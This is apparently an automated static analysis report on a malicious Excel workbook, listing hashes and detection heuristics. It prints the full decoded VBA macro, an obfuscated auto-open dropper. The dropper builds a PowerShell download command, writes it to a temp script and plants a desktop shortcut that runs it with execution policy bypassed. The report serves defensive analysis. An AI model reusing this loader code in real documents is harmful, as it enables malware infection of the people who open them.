Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 af7f61de1689b06c…

MALICIOUS

Office (OOXML)

20.2 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-03-31
MD5: 30d6cdb59876c5bd6667e2cd3c72e689 SHA-1: e66059cad1a8a919ebc555ade1f8c05b77fe531a SHA-256: af7f61de1689b06c08358cf803aef164209d2abaf7171a47227f34cf019cac50
260 Risk Score

Heuristics 10

  • VBA project inside OOXML medium 9 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
                With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
                With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
                With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
            var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5291 bytes
SHA-256: 0c44e0f8d3a3e2a03ada257d84a1edf39d0869081f52ff45304efdd5cf17e113
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
'Attribute VB_Name = "Module1"
Option Explicit

Private Const GENERIC_WRITE = &H40000000
Private Const GENERIC_READ = &H80000000
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const CREATE_ALWAYS = 2
Private Const OPEN_ALWAYS = 4
Private Const INVALID_HANDLE_VALUE = -1


Private Declare PtrSafe Function ReadFile Lib "kernel32" (ByVal hFile As Long, _
   lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, _
   lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long

Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
  ByVal hObject As Long) As Long

Private Declare PtrSafe Function WriteFile Lib "kernel32" ( _
  ByVal hFile As Long, lpBuffer As Any, _
  ByVal nNumberOfBytesToWrite As Long, _
  lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long

Private Declare PtrSafe Function CreateFile Lib "kernel32" _
  Alias "CreateFileA" (ByVal lpFileName As String, _
  ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, _
  ByVal lpSecurityAttributes As Long, _
  ByVal dwCreationDisposition As Long, _
  ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) _
  As Long

Private Declare PtrSafe Function FlushFileBuffers Lib "kernel32" ( _
  ByVal hFile As Long) As Long
Public Function WriteStringToFile(FileName As String, ByVal TheData As String, _
    Optional NoOverwrite As Boolean = False) As Boolean

Dim lHandle As Long
Dim lSuccess As Long
Dim lBytesWritten As Long, lBytesToWrite As Long
If NoOverwrite = True And Dir(FileName) <> "" Then Exit Function
lBytesToWrite = Len(TheData)
lHandle = CreateFile(FileName, GENERIC_WRITE Or GENERIC_READ, _
                     0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)

If lHandle <> INVALID_HANDLE_VALUE Then
   lSuccess = WriteFile(lHandle, ByVal TheData, _
                        lBytesToWrite, lBytesWritten, 0) <> 0
   If lSuccess <> 0 Then
      lSuccess = FlushFileBuffers(lHandle)
      lSuccess = CloseHandle(lHandle)
   End If
End If
ErrorHandler:
WriteStringToFile = lSuccess <> 0
End Function

Public Function Jeez()

    Dim decryptValue As String
    Dim data() As String
    Dim sAns As String
    Dim tempPath As String
    Dim sShortcutLocation As String
    Dim targetPath As String
    Dim arguments As String
    Dim var As String
    decryptValue = "ttpexereqershcom-outpss"
    If "catsanddogs" = "catsanddogs" Then
        var = "Invoke-Webabcduest hefghs:///favicon.icon appleFile " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx; " & Environ$("LOCALAPPDATA") & "\Temp\diagnostics.xlsx"
        var = Replace(var, "efgh", Left(LCase(decryptValue), 3))
        var = Replace(var, "abcd", Mid(LCase(decryptValue), 7, 3))
        var = Replace(var, "xlsx", Mid(LCase(decryptValue), 4, 3))
        var = Replace(var, "microsoft", Mid(LCase(decryptValue), 14, 3))
        var = Replace(var, "apple", Mid(LCase(decryptValue), 17, 4))
        sShortcutLocation = Environ$("USERPROFILE") & "\Desktop\GA17asa.lnk"
        If "doglovescat" = "doglovescat" Then
            tempPath = Environ$("LOCALAPPDATA") & "\Temp\malicious.ps1"
            tempPath = Replace(tempPath, "netflix", Mid(LCase(decryptValue), 21, 3))
            arguments = "-xlsxc bypass -File " & tempPath
            arguments = Replace(arguments, "xlsx", Mid(LCase(decryptValue), 4, 3))
            If "notfair" = "notfair" Then
                targetPath = "C:\Windows\System32\Windowspowqwerell\v1.0\powqwerell.xlsx"
                targetPath = Replace(targetPath, "xlsx", Mid(LCase(decryptValue), 4, 3))
                targetPath = Replace(targetPath, "qwer", Mid(LCase(decryptValue), 10, 4))
            Else
                MsgBox "Dogsarecoolzzz!"
            End If
        End If
        If "dogsandcats" = "dogsandcats" Then
            With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
                .targetPath = targetPath
                .Description = "rekins"
                .arguments = arguments
                .IconLocation = "%SystemRoot%\system32\shell32.dll, 3"
                 .Save
            End With
            WriteStringToFile tempPath, var
            MsgBox "Dodieties uz darbavirsmu, lai apskatitu failus mape GA17332332"
        Else
            MsgBox "Dogsarecool!"
        End If
    Else
        MsgBox "Dogsarecoolx!"
    End If
End Function

Sub Auto_Open()
Jeez
End Sub

Sub AutoOpen()
Jeez
End Sub

Sub Workbook_Open()
Jeez
End Sub

Sub WorkbookOpen()
Jeez
End Sub

Sub Document_Open()
Jeez
End Sub

Sub DocumentOpen()
Jeez
End Sub







Attribute VB_Name = "Ši_darbgramata"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Lapa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 34816 bytes
SHA-256: 1175dcba774d86bcc4437ca26cee36cb8c4d17f56af23e2b97d5c4b6e79255cb